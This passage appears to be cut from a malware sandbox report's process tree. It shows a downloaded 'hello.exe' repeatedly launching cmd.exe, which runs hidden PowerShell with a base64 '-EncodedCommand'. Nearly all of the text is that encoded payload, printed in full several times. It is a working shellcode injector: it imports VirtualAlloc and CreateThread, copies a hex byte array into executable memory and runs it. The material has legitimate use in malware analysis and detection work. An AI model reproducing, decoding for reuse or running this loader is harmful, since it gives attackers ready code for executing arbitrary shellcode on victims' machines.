QAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:4508

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:8804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:4224

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxA